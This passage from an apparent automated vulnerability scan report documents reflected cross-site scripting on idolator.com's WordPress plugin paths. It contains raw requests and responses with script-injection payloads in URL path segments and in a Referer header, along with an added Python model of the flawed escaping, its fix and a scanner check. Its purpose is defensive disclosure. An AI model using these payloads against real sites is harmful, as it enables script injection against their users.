User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:15 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2fa4a5\"><script>alert(1)</script>b8140d6ede4/soundmanager2.swf" />
...[SNIP]...

4.171. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 5 (the fifth path segment, the file name soundmanager2.swf) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6144"><script>alert(1)</script>199c16dfceb was submitted in REST URL parameter 5 and was echoed as c6144\"><script>alert(1)</script>199c16dfceb in the application's response. The quote is backslash-escaped (\") rather than HTML-encoded; a backslash is not an escape character in an HTML attribute, so the attribute is still closed and the <script> element that follows is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swfc6144"><script>alert(1)</script>199c16dfceb HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:26 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swfc6144\"><script>alert(1)</script>199c16dfceb" />
...[SNIP]...
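
Findings 4.165 to 4.171 above and 4.172 below share one sink: the request path is reflected into the hidden redirect_to input with the injected double quote backslash-escaped. The Python below is an added example, not code from this report, from WordPress or from the wpaudio-mp3-player plugin. It models that sink (the addslashes-style escaping is an assumption drawn from the \" the responses show; the report does not identify the code that emits the field), renders the attribute-context encoding that fixes it, parses both fragments the way a browser tokenizer would to show which one yields a <script> element, and classifies how a scanner canary comes back in a response body. The canary and request path are the ones from finding 4.165; the idolator.com origin is used only to rebuild the literal string the report shows.

```python
"""Model of the redirect_to reflection in findings 4.165-4.172 (added example).

The responses show the request path echoed into
  <input type="hidden" name="redirect_to" value="...">
with the injected double quote turned into \\" instead of &quot;.  An HTML
parser gives a backslash no special meaning, so \\" still ends the attribute
value and the <script> element that follows becomes real markup.
"""
import html
from html.parser import HTMLParser
from typing import Optional

# Canary in the shape the scanner used in finding 4.165: random prefix,
# attribute-breaking sequence, random suffix.
CANARY = '6e990"><script>alert(1)</script>c4efd4a2e08'
# Request path from finding 4.165 (the canary is appended to the 4th segment "sm2").
REQUEST_PATH = ("/wp-content/plugins/wpaudio-mp3-player/sm2" + CANARY
                + "/soundmanager2-nodebug-jsmin.js?ver=2.8.6")
ORIGIN = "http://idolator.com"


def addslashes(s: str) -> str:
    """PHP addslashes() behaviour.  Assumption: this is the escaping behind
    the \\" seen in the report; the report only shows the result."""
    return (s.replace("\\", "\\\\").replace('"', '\\"')
             .replace("'", "\\'").replace("\x00", "\\0"))


def render_vulnerable(path: str) -> str:
    """The sink as the report shows it: quote backslash-escaped, nothing else."""
    return (f'<input type="hidden" name="redirect_to" '
            f'value="{ORIGIN}{addslashes(path)}" />')


def render_fixed(path: str) -> str:
    """Attribute-context encoding (what htmlspecialchars(ENT_QUOTES) or
    WordPress esc_attr() produce): quote -> &quot;, < -> &lt;, > -> &gt;."""
    return (f'<input type="hidden" name="redirect_to" '
            f'value="{ORIGIN}{html.escape(path, quote=True)}" />')


class _Tags(HTMLParser):
    """Collects start tags and the attributes of the input element, the way a
    browser's tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []
        self.input_attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)


def _parse(fragment: str) -> _Tags:
    p = _Tags()
    p.feed(fragment)
    p.close()
    return p


def script_injected(fragment: str) -> bool:
    """True if parsing the fragment yields a <script> element, i.e. the
    reflected input broke out of the attribute."""
    return "script" in _parse(fragment).tags


def redirect_value(fragment: str) -> str:
    """The redirect_to value a browser would actually submit."""
    return _parse(fragment).input_attrs.get("value", "")


def classify_reflection(body: str, canary: str) -> Optional[str]:
    """How the canary came back: 'raw' or 'backslash' both break an attribute
    context; 'encoded' is safe there; None means it was not reflected."""
    if canary in body:
        return "raw"
    if addslashes(canary) in body:
        return "backslash"
    if html.escape(canary, quote=True) in body:
        return "encoded"
    return None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        frag = render(REQUEST_PATH)
        print(f"{name}: reflection={classify_reflection(frag, CANARY)} "
              f"script_injected={script_injected(frag)} "
              f"redirect_to={redirect_value(frag)!r}")
```

Run it as a script: the vulnerable rendering is classified as a backslash reflection and parses into an input element whose value ends at the backslash, followed by a script element; the fixed rendering is classified as encoded, parses into a single input element, and its decoded value round-trips to exactly the original URI. The classify_reflection check is the one to keep in a scanner: a backslash-escaped echo into an attribute is as exploitable as a raw one and should be rated the same.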

4.172. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/themes/idolator_1.5/images/favicon.ico

Issue detail

The value of REST URL parameter 1 (the first path segment, wp-content) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f889"><script>alert(1)</script>d06b96a1bc7 was submitted in REST URL parameter 1 and was echoed as 2f889\"><script>alert(1)</script>d06b96a1bc7 in the application's response. The quote is backslash-escaped (\") rather than HTML-encoded; a backslash is not an escape character in an HTML attribute, so the attribute is still closed and the <script> element that follows is parsed as markup. A percent-encoded variant of this payload, with alert("FAVICON") in place of alert(1), is the Referer header of the other requests in this group.